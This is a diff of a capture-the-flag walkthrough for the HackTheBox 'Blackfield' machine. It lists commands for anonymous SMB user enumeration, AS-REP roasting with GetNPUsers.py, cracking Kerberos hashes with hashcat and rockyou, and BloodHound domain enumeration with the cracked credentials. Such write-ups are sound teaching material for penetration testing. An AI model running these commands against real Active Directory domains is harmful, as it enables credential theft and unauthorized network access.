JosephJ12/CTF-Walkthroughs/HTB - Blackfield.md

 <img width="912" height="443" alt="image" src="https://github.com/user-attachments/assets/d44570cb-edcc-41f3-a6af-2078cdb5ab70" />

 2. SMB allows anonymous logon.
 We find a profiles$ share that has a list of users so create a user list from it.

-Then,
+`smbclient //blackfield.local/profiles$ -U '' -c ls | awk '{print $1}' > users.list`

+3. Now that we have a users list, we will try ASREPRoasting to get a user hash and gain an initial foothold in the domain.

+`GetNPUsers.py -request -usersfile users.list -outputfile asreproastables.txt -dc-ip 10.129.229.17 -format hashcat 'blackfield.local/'`

+4. Success!
+Now crack the hash and we get user support's credentials.

+`hashcat -m 18200 asreproastables.txt /usr/share/wordlists/rockyou.txt`

+5. Now that we have a valid credentials on the domain, we run Bloodhound to enumerate the network

+`sudo bloodhound-python -d blackfield.local -u support -p $(cat recon/support.pass) -ns 10.129.229.17 -c all`